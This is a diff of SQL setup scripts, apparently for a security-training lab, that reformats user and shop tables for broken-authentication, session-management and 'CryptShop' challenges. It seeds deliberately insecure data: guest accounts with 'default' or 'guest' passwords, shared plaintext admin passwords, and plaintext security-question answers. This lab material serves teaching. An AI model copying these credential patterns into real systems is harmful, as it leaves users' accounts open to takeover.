+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (40, 'guest1', 'default', 'guest1@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (41, 'guest2', 'default', 'guest2@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (42, 'guest3', 'default', 'guest3@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (43, 'guest4', 'default', 'guest4@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (44, 'guest5', 'default', 'guest5@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (45, 'guest6', 'default', 'guest6@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (46, 'guest7', 'default', 'guest7@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (47, 'guest8', 'default', 'guest8@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (48, 'guest9', 'guest', 'guest9@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (49, 'guest11', 'guest', 'guest11@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (50, 'guest12', 'guest', 'guest12@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (51, 'guest13', 'guest', 'guest13@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (52, 'guest14', 'guest', 'guest14@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (53, 'guest15', 'guest', 'guest15@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (54, 'guest16', 'guest', 'guest16@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (55, 'guest17', 'guest', 'guest17@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (56, 'guest18', 'guest', 'guest18@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (57, 'guest19', 'guest', 'guest19@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (58, 'guest20', 'guest', 'guest20@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (59, 'guest21', 'guest', 'guest21@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (60, 'guest22', 'guest', 'guest22@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (61, 'guest23', 'guest', 'guest23@guest.com', 'guest');
+INSERT INTO `BrokenAuthAndSessMangChalFive`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (62, 'guest10', 'guest', 'guest10@guest.com', 'guest');
 
 COMMIT;
 
@@ -1160,115 +674,48 @@ COMMIT;
 -- Session Management Challenge Six Schema
 -- -----------------------------------------------------
 -- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalSix`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalSix` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalSix` ;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalSix` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalSix` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalSix` ;
 
 -- -----------------------------------------------------
 -- Table `BrokenAuthAndSessMangChalSix`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalSix`.`users`
-(
-    `userId`
-    INT
-    NOT
-    NULL,
-    `userName`
-    VARCHAR
-(
-    32
-) NOT NULL ,
-    `userPassword` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userAddress` VARCHAR
-(
-    128
-) NOT NULL ,
-    `secretQuestion` VARCHAR
-(
-    191
-) NOT NULL ,
-    `secretAnswer` VARCHAR
-(
-    128
-) NOT NULL,
-    PRIMARY KEY
-(
-    `userId`
-) )
-    ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalSix`.`users` (
+  `userId` INT NOT NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `userPassword` VARCHAR(128) NOT NULL ,
+  `userAddress` VARCHAR(128) NOT NULL ,
+  `secretQuestion` VARCHAR(191) NOT NULL ,
+  `secretAnswer` VARCHAR(128) NOT NULL,
+  PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `BrokenAuthAndSessMangChalSix`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalSix`;
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (1224, 'manager', '!148972hsfalkjlkfi381', 'zoidberg23@shepherd.com',
-        'What is the first name of the person you first kissed?', 'Lena Andrysiak');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (1225, 'sean', '!148972hsfalkjlkfi381', 'zoidberg24@shepherd.com',
-        'What is the first name of the person you first kissed?', 'Ronit Tornincasa');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (3214, 'administrator', '!148972hsfalkjlkfi381', 'buzzthebald@shepherd.com',
-        'What is the last name of the teacher who gave you your first failing grade?', 'Aran Keegan');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (3212, 'root', '!148972hsfalkjlkfi381', 'elitehacker@shepherd.com',
-        'What is the name of the place your wedding reception was held?', 'Deerburn Hotel');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (6344, 'superuser', '!148972hsfalkjlkfi381', 'superman@security.com',
-        'Who was the first person to beat you up when you were 8 years old?', 'Lileas Lockwood');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (4524, 'privileged', '1489!72hsfalkjlkfi381', 'spoiltbrat@security.com',
-        'What was the name of the person who stole your TV the second time?', 'Olwen Sordi');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (6343, 'mark', '148!972hsfalkjlkfi381', 'superman2@security.com', 'Who is your favourite Barista?',
-        'Buzz Fendall');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (6342, 'markdenihan', '148!972hsfalkjlkfi381', 'superman3@security.com',
-        'Who is your most favourite person you have not met?', 'Etna Filippi');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (6341, 'seanduggan', '148972!hsfalkjlkfi381', 'superman4@security.com',
-        'Who is your most favourite person you have not met?', 'Emily Fabian');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (6551, 'rootuser', '14897!2hsfalkjlkfi381', 'superman6@security.com',
-        'Who is your most favourite person you have not met?', 'Leola Naggia');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (6552, 'adminuser', '1489!72hsfalkjlkfi381', 'superman7@security.com',
-        'Who is your most favourite person you have not met?', 'Gladys Gabrielli');
-INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                    `secretQuestion`, `secretAnswer`)
-VALUES (6559, 'shepherd', '148972hsfalk!jlkfi381', 'superman8@security.com',
-        'Who is your most favourite person you have not met?', 'Morag Bristol');
+USE `BrokenAuthAndSessMangChalSix`;
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (1224, 'manager', 		'!148972hsfalkjlkfi381', 'zoidberg23@shepherd.com',	'What is the first name of the person you first kissed?', 'Lena Andrysiak');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (1225, 'sean',	 		'!148972hsfalkjlkfi381', 'zoidberg24@shepherd.com',	'What is the first name of the person you first kissed?', 'Ronit Tornincasa');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (3214, 'administrator', 	'!148972hsfalkjlkfi381', 'buzzthebald@shepherd.com','What is the last name of the teacher who gave you your first failing grade?', 'Aran Keegan');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (3212, 'root', 			'!148972hsfalkjlkfi381', 'elitehacker@shepherd.com','What is the name of the place your wedding reception was held?', 'Deerburn Hotel');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6344, 'superuser', 		'!148972hsfalkjlkfi381', 'superman@security.com',	'Who was the first person to beat you up when you were 8 years old?', 'Lileas Lockwood');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (4524, 'privileged', 		'1489!72hsfalkjlkfi381', 'spoiltbrat@security.com',	'What was the name of the person who stole your TV the second time?', 'Olwen Sordi');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6343, 'mark', 			'148!972hsfalkjlkfi381', 'superman2@security.com',	'Who is your favourite Barista?', 'Buzz Fendall');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6342, 'markdenihan', 	'148!972hsfalkjlkfi381', 'superman3@security.com',	'Who is your most favourite person you have not met?', 'Etna Filippi');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6341, 'seanduggan', 		'148972!hsfalkjlkfi381', 'superman4@security.com',	'Who is your most favourite person you have not met?', 'Emily Fabian');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6551, 'rootuser', 		'14897!2hsfalkjlkfi381', 'superman6@security.com',	'Who is your most favourite person you have not met?', 'Leola Naggia');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6552, 'adminuser', 		'1489!72hsfalkjlkfi381', 'superman7@security.com',	'Who is your most favourite person you have not met?', 'Gladys Gabrielli');
+INSERT INTO `BrokenAuthAndSessMangChalSix`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6559, 'shepherd', 		'148972hsfalk!jlkfi381', 'superman8@security.com',	'Who is your most favourite person you have not met?', 'Morag Bristol');
 
 COMMIT;
 
@@ -1277,115 +724,48 @@ COMMIT;
 -- Session Management Challenge Seven Schema
 -- -----------------------------------------------------
 -- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalSeven`;
-CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalSeven` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`BrokenAuthAndSessMangChalSeven` ;
+DROP SCHEMA IF EXISTS `BrokenAuthAndSessMangChalSeven` ;
+CREATE SCHEMA IF NOT EXISTS `BrokenAuthAndSessMangChalSeven` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `BrokenAuthAndSessMangChalSeven` ;
 
 -- -----------------------------------------------------
 -- Table `BrokenAuthAndSessMangChalSeven`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalSeven`.`users`
-(
-    `userId`
-    INT
-    NOT
-    NULL,
-    `userName`
-    VARCHAR
-(
-    32
-) NOT NULL ,
-    `userPassword` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userAddress` VARCHAR
-(
-    128
-) NOT NULL ,
-    `secretQuestion` VARCHAR
-(
-    191
-) NOT NULL ,
-    `secretAnswer` VARCHAR
-(
-    128
-) NOT NULL,
-    PRIMARY KEY
-(
-    `userId`
-) )
-    ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `BrokenAuthAndSessMangChalSeven`.`users` (
+  `userId` INT NOT NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `userPassword` VARCHAR(128) NOT NULL ,
+  `userAddress` VARCHAR(128) NOT NULL ,
+  `secretQuestion` VARCHAR(191) NOT NULL ,
+  `secretAnswer` VARCHAR(128) NOT NULL,
+  PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `BrokenAuthAndSessMangChalSeven`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`BrokenAuthAndSessMangChalSeven`;
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (1224, 'manager', '!148972hsfalkjlkfi381', 'zoidberg23@shepherd.com', 'What is your favourite flower?',
-        'Jade Vine');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (1225, 'sean', '!148972hsfalkjlkfi381', 'zoidberg24@shepherd.com', 'What is your favourite flower?',
-        'Corpse Flower');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (3214, 'administrator', '!148972hsfalkjlkfi381', 'buzzthebald@shepherd.com', 'What is your favourite flower?',
-        'Gibraltar Campion');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (3212, 'root', '!148972hsfalkjlkfi381', 'elitehacker@shepherd.com', 'What is your favourite flower?',
-        'Franklin Tree');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (6344, 'superuser', '!148972hsfalkjlkfi381', 'superman@security.com', 'What is your favourite flower?',
-        'Jade Vine');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (4524, 'privileged', '1489!72hsfalkjlkfi381', 'spoiltbrat@security.com', 'What is your favourite flower?',
-        'Middlemist Red');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (6343, 'mark', '148!972hsfalkjlkfi381', 'superman2@security.com', 'What is your favourite flower?',
-        'Chocolate Cosmos');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (6342, 'markdenihan', '148!972hsfalkjlkfi381', 'superman3@security.com', 'What is your favourite flower?',
-        'Ghost Orchid');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (6341, 'seanduggan', '148972!hsfalkjlkfi381', 'superman4@security.com', 'What is your favourite flower?',
-        'Jade Vine');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (6551, 'rootuser', '14897!2hsfalkjlkfi381', 'superman6@security.com', 'What is your favourite flower?',
-        'Ghost Orchid');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (6552, 'adminuser', '1489!72hsfalkjlkfi381', 'superman7@security.com', 'What is your favourite flower?',
-        'Corpse Flower');
-INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`,
-                                                      `secretQuestion`, `secretAnswer`)
-VALUES (6559, 'shepherd', '148972hsfalk!jlkfi381', 'superman8@security.com', 'What is your favourite flower?',
-        'Gibraltar Campion');
+USE `BrokenAuthAndSessMangChalSeven`;
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (1224, 'manager', 		'!148972hsfalkjlkfi381', 'zoidberg23@shepherd.com',		'What is your favourite flower?', 'Jade Vine');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (1225, 'sean',	 		'!148972hsfalkjlkfi381', 'zoidberg24@shepherd.com',		'What is your favourite flower?', 'Corpse Flower');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (3214, 'administrator', 	'!148972hsfalkjlkfi381', 'buzzthebald@shepherd.com','What is your favourite flower?', 'Gibraltar Campion');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (3212, 'root', 			'!148972hsfalkjlkfi381', 'elitehacker@shepherd.com',	'What is your favourite flower?', 'Franklin Tree');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6344, 'superuser', 		'!148972hsfalkjlkfi381', 'superman@security.com',	'What is your favourite flower?', 'Jade Vine');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (4524, 'privileged', 		'1489!72hsfalkjlkfi381', 'spoiltbrat@security.com',	'What is your favourite flower?', 'Middlemist Red');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6343, 'mark', 			'148!972hsfalkjlkfi381', 'superman2@security.com',		'What is your favourite flower?', 'Chocolate Cosmos');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6342, 'markdenihan', 	'148!972hsfalkjlkfi381', 'superman3@security.com',		'What is your favourite flower?', 'Ghost Orchid');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6341, 'seanduggan', 		'148972!hsfalkjlkfi381', 'superman4@security.com',	'What is your favourite flower?', 'Jade Vine');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6551, 'rootuser', 		'14897!2hsfalkjlkfi381', 'superman6@security.com',		'What is your favourite flower?', 'Ghost Orchid');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6552, 'adminuser', 		'1489!72hsfalkjlkfi381', 'superman7@security.com',	'What is your favourite flower?', 'Corpse Flower');
+INSERT INTO `BrokenAuthAndSessMangChalSeven`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `secretQuestion`, `secretAnswer`) VALUES (6559, 'shepherd', 		'148972hsfalk!jlkfi381', 'superman8@security.com',		'What is your favourite flower?', 'Gibraltar Campion');
 
 COMMIT;
 
@@ -1395,99 +775,54 @@ COMMIT;
 -- -----------------------------------------------------
 -- -----------------------------------------------------
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
 
-DROP SCHEMA IF EXISTS `CryptShop`;
-CREATE SCHEMA IF NOT EXISTS `CryptShop` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`CryptShop` ;
+DROP SCHEMA IF EXISTS `CryptShop` ;
+CREATE SCHEMA IF NOT EXISTS `CryptShop` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `CryptShop` ;
 
 -- -----------------------------------------------------
 -- Table `CryptShop`.`items`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `CryptShop`.`items`
-(
-    `itemId`
-    INT
-    NOT
-    NULL,
-    `itemName`
-    VARCHAR
-(
-    45
-) NULL,
-    `itemCost` INT NULL,
-    PRIMARY KEY
-(
-    `itemId`
-))
-    ENGINE = InnoDB;
+CREATE TABLE IF NOT EXISTS `CryptShop`.`items` (
+  `itemId` INT NOT NULL,
+  `itemName` VARCHAR(45) NULL,
+  `itemCost` INT NULL,
+  PRIMARY KEY (`itemId`))
+ENGINE = InnoDB;
 
 -- -----------------------------------------------------
 -- Table `CryptShop`.`coupons`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `CryptShop`.`coupons`
-(
-    `couponId`
-    INT
-    NOT
-    NULL,
-    `perCentOff`
-    INT
-    NULL,
-    `couponCode`
-    VARCHAR
-(
-    128
-) NULL,
-    `itemId` INT NOT NULL,
-    PRIMARY KEY
-(
-    `couponId`
-),
-    INDEX `fk_coupons_items_idx`
-(
-    `itemId` ASC
-),
-    CONSTRAINT `fk_coupons_items`
-    FOREIGN KEY
-(
-    `itemId`
-)
-    REFERENCES `CryptShop`.`items`
-(
-    `itemId`
-)
+CREATE TABLE IF NOT EXISTS `CryptShop`.`coupons` (
+  `couponId` INT NOT NULL,
+  `perCentOff` INT NULL,
+  `couponCode` VARCHAR(128) NULL,
+  `itemId` INT NOT NULL,
+  PRIMARY KEY (`couponId`),
+  INDEX `fk_coupons_items_idx` (`itemId` ASC),
+  CONSTRAINT `fk_coupons_items`
+    FOREIGN KEY (`itemId`)
+    REFERENCES `CryptShop`.`items` (`itemId`)
     ON DELETE NO ACTION
     ON UPDATE NO ACTION)
-    ENGINE = InnoDB;
+ENGINE = InnoDB;
 
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `CryptShop`.`items`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`CryptShop`;
-INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (1, 'Pineapple', 30);
-INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (2, 'Orange', 3000);
-INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (3, 'Apple', 45);
-INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`)
-VALUES (4, 'Banana', 15);
+USE `CryptShop`;
+INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (1, 'Pineapple', 30);
+INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (2, 'Orange', 3000);
+INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (3, 'Apple', 45);
+INSERT INTO `CryptShop`.`items` (`itemId`, `itemName`, `itemCost`) VALUES (4, 'Banana', 15);
 
 COMMIT;
 
@@ -1495,22 +830,14 @@ COMMIT;
